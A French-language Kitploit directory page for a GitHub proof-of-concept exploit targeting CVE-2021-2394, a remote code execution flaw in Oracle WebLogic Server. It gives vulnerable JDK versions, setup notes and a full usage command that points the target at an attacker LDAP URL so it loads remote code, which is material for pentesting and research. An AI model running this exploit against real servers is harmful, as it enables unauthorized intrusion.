Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-2394 — Exploit de preuve de concept pour CVE-2021-2394, une vulnérabilité d'exécution de code à distance dans Oracle WebLogic Server. Utilise la désérialisation LDAP ou RMI pour livrer une charge utile. | Kitploit
Outils/GitHubGitHub/lz2y/cve-2021-2394
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHublz2y/cve-2021-2394

CVE-2021-2394

Exploit de preuve de concept pour CVE-2021-2394, une vulnérabilité d'exécution de code à distance dans Oracle WebLogic Server. Utilise la désérialisation LDAP ou RMI pour livrer une charge utile.

Voir le dépôt
40201il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-2394

POC de CVE-2021-2394

  • Clause de non-responsabilité
    • Ce projet est réservé à un usage éducatif. Toute conséquence ou perte, directe ou indirecte, résultant de tests non autorisés relève de l'entière responsabilité de l'utilisateur.
  • Remarques

    • Le POC envoie des paquets via IIOP ; veuillez ajouter les dépendances correspondantes (les dépendances de la version 12.2.1.3.0 sont disponibles dans la release).
    • Veuillez utiliser une version plus ancienne du JDK pour installer WebLogic lors des tests.

      Pour l'exploitation basée sur RMI, les versions de JDK concernées sont celles antérieures à 6u132, 7u131 et 8u121. À partir de 8u122 et des versions ultérieures, un mécanisme de liste blanche de désérialisation a été ajouté, désactivant le chargement distant de code RMI. Pour l'exploitation basée sur LDAP, les versions de JDK concernées sont celles antérieures à 6u211, 7u201, 8u191 et 11.0.1. Dans la version 8u191, Oracle a imposé des restrictions sur le vecteur LDAP, publié le CVE-2018-3149, et désactivé le chargement distant de classes JNDI. Source : https://www.freebuf.com/vuls/279465.html

    • Si la reproduction échoue dans un environnement de machine virtuelle, consultez https://xz.aliyun.com/t/7498
  • Utilisation :

    • Démarrez un service ldap.
    • java -jar CVE_2021_2394.jar rhost rport ldapurl
    • Ex. : java -jar CVE_2021_2394.jar 192.168.137.1 7001 ldap://192.168.137.1:8087/Exploit
  • Liens de référence :

  • https://mp.weixin.qq.com/s/onoMpyenDkMmsoGEw8VO2A
  • https://github.com/Y4er/CVE-2020-14756
  • https://github.com/Y4er/CVE-2020-2551
  • Mise à jour

    • 2021/8/15 — Suppression de quelques codes inutiles.
  • Article d'analyse

    • https://mp.weixin.qq.com/s/AxJJxbkclr4ijXX8lpNAfw
  • Télécharger l’outil